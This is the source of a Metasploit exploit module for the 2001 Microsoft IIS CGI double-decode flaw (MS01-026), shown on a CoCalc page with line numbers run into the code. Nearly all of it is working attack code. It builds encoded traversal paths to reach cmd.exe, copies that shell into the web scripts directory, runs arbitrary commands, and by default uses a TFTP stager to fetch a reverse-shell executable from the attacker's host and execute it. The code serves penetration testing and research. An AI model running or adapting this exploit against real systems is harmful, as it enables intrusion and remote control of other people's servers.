CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/windows/iis/ms01_026_dbldecode.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpClient9include Msf::Exploit::CmdStager10include Msf::Exploit::FileDropper1112def initialize(info = {})13super(14update_info(15info,16'Name' => 'MS01-026 Microsoft IIS/PWS CGI Filename Double Decode Command Execution',17'Description' => %q{18This module will execute an arbitrary payload on a Microsoft IIS installation19that is vulnerable to the CGI double-decode vulnerability of 2001.2021This module has been tested successfully on:2223Windows 2000 Professional (SP0) (EN);24Windows 2000 Professional (SP1) (AR);25Windows 2000 Professional (SP1) (CZ);26Windows 2000 Server (SP0) (FR);27Windows 2000 Server (SP1) (EN); and28Windows 2000 Server (SP1) (SE).2930Note: This module will leave a Metasploit payload exe in the IIS scripts directory.31},32'Author' => [ 'jduck' ],33'License' => MSF_LICENSE,34'References' => [35[ 'CVE', '2001-0333' ],36[ 'OSVDB', '556' ],37[ 'BID', '2708' ],38[ 'MSB', 'MS01-026' ],39[ 'URL', 'http://marc.info/?l=bugtraq&m=98992056521300&w=2' ]40],41'Platform' => 'win',42'Targets' => [43[44'Windows (Dropper)',45{46'Platform' => 'win',47'Arch' => [ARCH_X86],48'DefaultOptions' => { 'PAYLOAD' => 'windows/shell/reverse_tcp' },49'Type' => :win_dropper50}51],52[53'Windows (Command)',54{55'Platform' => 'win',56'Arch' => ARCH_CMD,57'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/generic' },58'Type' => :win_command59}60]61],62'CmdStagerFlavor' => 'tftp',63'Notes' => {64'Stability' => [ CRASH_SAFE ],65'Reliability' => [ REPEATABLE_SESSION ],66'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ]67},68'DefaultTarget' => 0,69'DisclosureDate' => '2001-05-15'70)71)7273register_options(74[75Opt::RPORT(80),76OptString.new('WINDIR', [ false, 'The Windows directory name of the target host', nil ]),77OptInt.new('DEPTH', [ true, 'Traversal depth to reach the drive root', 2 ])78]79)8081self.needs_cleanup = true82end8384def dotdotslash85[86'..%255c',87'..%%35c',88'..%%35%63',89'..%25%35%63',90'.%252e/',91'%252e./',92'%%32%65./',93'.%%32%65/',94'.%25%32%65/',95'%25%32%65./'96].sample97end9899# Detect the correct Windows directory name.100# Unfortunately, the IIS scripts directory must101# be located on the same drive as %SystemRoot%.102def detect_windows_directory103win_dirs = %w[winnt windows]104matches = [105'Directory of',106'\\inetpub\\',107"\\scripts\r\n"108]109110win_dirs.each do |dir|111res = execute_command('dir', windir: dir)112next unless res113next unless res.code == 200114next unless res.body115116matches.each do |m|117return dir if res.body.to_s.include?(m)118end119end120121nil122end123124def check125win_dir = detect_windows_directory126win_dir ? CheckCode::Vulnerable("Found Windows directory name: #{win_dir}") : CheckCode::Safe127end128129def execute_command(cmd, opts = {})130# Don't run the start command...131# We'll execute the payload via IIS later.132# Using the "start" method doesn't seem to make IIS very happy :(133return if cmd.start_with?('start') && cmd.include?('.exe')134135vprint_status("Executing command: #{cmd}")136if opts[:cgifname]137cmd_path = opts[:cgifname]138else139cmd_path = ''140datastore['DEPTH'].times { cmd_path << dotdotslash }141cmd_path << (opts[:windir] || @win_dir)142cmd_path << '/system32/cmd.exe'143end144uri = "/scripts/#{cmd_path}?/x+/c+#{Rex::Text.uri_encode(cmd)}"145send_request_cgi({ 'uri' => uri }, 20)146end147148def copy_cmd_exe_to_scripts_directory149fname = "#{rand_text_alphanumeric(4..7)}.exe"150print_status("Copying \"\\#{@win_dir}\\system32\\cmd.exe\" to the IIS scripts directory as \"#{fname}\"...")151res = execute_command("copy \\#{@win_dir}\\system32\\cmd.exe #{fname}")152fail_with(Failure::Unknown, 'No reply from server') unless res153fname154end155156def exploit157@win_dir = datastore['WINDIR'] || detect_windows_directory158159fail_with(Failure::NotVulnerable, 'Unable to detect the target host Windows directory (maybe not vulnerable)!') unless @win_dir160161print_status("Using Windows directory \"#{@win_dir}\"")162163@cmd_exe_fname = copy_cmd_exe_to_scripts_directory164165case target['Type']166when :win_command167res = execute_command(payload.encoded, cgifname: @cmd_exe_fname)168169if res && res.body170cmd_res = res.code == 200 ? res.body : res.body.to_s.scan(%r{<pre>(.*?)</pre>}m).flatten.first.to_s171if cmd_res.strip.blank?172print_status('Command returned no output')173else174print_good('Command output:')175print_line(cmd_res)176end177else178print_error('No reply')179end180when :win_dropper181tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']182execute_cmdstager(183temp: '.',184linemax: 1_400,185cgifname: @cmd_exe_fname,186tftphost: tftphost,187# Force noconcat so we can skip the "start" command in execute_command method188noconcat: true,189# We can't delete the payload while it is running, so don't try190nodelete: true191)192193exe_payload = stager_instance.payload_exe194register_file_for_cleanup(exe_payload)195196print_status("Triggering payload \"#{exe_payload}\" via a direct request...")197send_request_cgi({ 'uri' => "/scripts/#{exe_payload}" }, 1)198end199end200201# Remove the copied cmd.exe from the IIS scripts directory202def cleanup203execute_command("del #{@cmd_exe_fname}") if @cmd_exe_fname204ensure205super206end207end208209210